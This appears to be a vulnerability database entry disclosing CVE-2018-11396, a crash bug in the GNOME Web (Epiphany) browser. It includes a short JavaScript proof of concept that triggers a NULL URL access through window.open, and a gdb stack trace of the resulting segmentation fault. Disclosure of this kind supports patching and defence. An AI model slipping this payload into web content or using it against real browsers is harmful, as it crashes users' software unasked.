Lucene search

K

Epiphany 3.28.2.1 Denial Of Service

🗓️ 01 Jun 2018 00:00:00Reported by Mishra DhirajType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Epiphany Denial Of Service via NULL URL acces

Show more
Related
Code
ReporterTitlePublishedViews
Family
Kitploit
BFuzz - Fuzzing Browsers (Chrome & Firefox)
1 Nov 201820:42
kitploit
Prion
Design/Logic Flaw
23 May 201813:29
prion
Exploit DB
Epiphany 3.28.2.1 - Denial of Service
1 Jun 201800:00
exploitdb
Tenable Nessus
openSUSE Security Update : epiphany (openSUSE-2019-2318)
17 Oct 201900:00
nessus
Tenable Nessus
Fedora 28 : 1:epiphany (2018-a5e45fc9f7)
3 Jan 201900:00
nessus
Tenable Nessus
Fedora 27 : 1:epiphany (2018-de5457b0a2)
25 Jun 201800:00
nessus
UbuntuCve
CVE-2018-11396
23 May 201800:00
ubuntucve
NVD
CVE-2018-11396
23 May 201813:29
nvd
OpenVAS
openSUSE: Security Advisory for epiphany (openSUSE-SU-2019:2318-1)
17 Oct 201900:00
openvas
OpenVAS
Fedora Update for epiphany FEDORA-2018-a5e45fc9f7
16 Jun 201800:00
openvas
Rows per page
`Summary:  
ephy-session.c in libephymain.so in GNOME Web (aka Epiphany) through 3.28.2.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that triggers access to a NULL URL, as demonstrated by a crafted window.open call, CVE-2018-11396 was assigned to this issue.  
  
PoC:  
<script>  
win = window.open("hello world");  
</script>  
  
Stack trace:  
ftw@ftw-box:~$ gdb epiphany  
(gdb) run  
Starting program: /usr/bin/epiphany   
[Thread debugging using libthread_db enabled]  
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".  
[New Thread 0x7fffe08bc700 (LWP 2279)]  
[New Thread 0x7fffdee51700 (LWP 2280)]  
[New Thread 0x7fffde650700 (LWP 2281)]  
[New Thread 0x7fffdcdd5700 (LWP 2282)]  
[New Thread 0x7fffd7fff700 (LWP 2283)]  
[New Thread 0x7fffd77fe700 (LWP 2284)]  
[New Thread 0x7fffd6ffd700 (LWP 2285)]  
[New Thread 0x7fffd67fc700 (LWP 2286)]  
[New Thread 0x7fffd5b8c700 (LWP 2287)]  
[New Thread 0x7fffd538b700 (LWP 2288)]  
[New Thread 0x7fff8f486700 (LWP 2294)]  
[New Thread 0x7fff8da1e700 (LWP 2304)]  
[New Thread 0x7fff8d21d700 (LWP 2305)]  
[New Thread 0x7fff8ea7f700 (LWP 2315)]  
[Thread 0x7fffd5b8c700 (LWP 2287) exited]  
[Thread 0x7fffd67fc700 (LWP 2286) exited]  
  
Thread 15 "pool" received signal SIGSEGV, Segmentation fault.  
[Switching to Thread 0x7fff8ea7f700 (LWP 2315)]  
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so  
(gdb) bt  
#0 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so  
#1 0x00007ffff7079be6 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0  
#2 0x00007ffff73fe7d0 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0  
#3 0x00007ffff73fde05 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0  
#4 0x00007fffefc246db in start_thread (arg=0x7fff8ea7f700) at pthread_create.c:463  
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95  
(gdb)  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jun 2018 00:00Current
EPSS0.004
19
.json
Report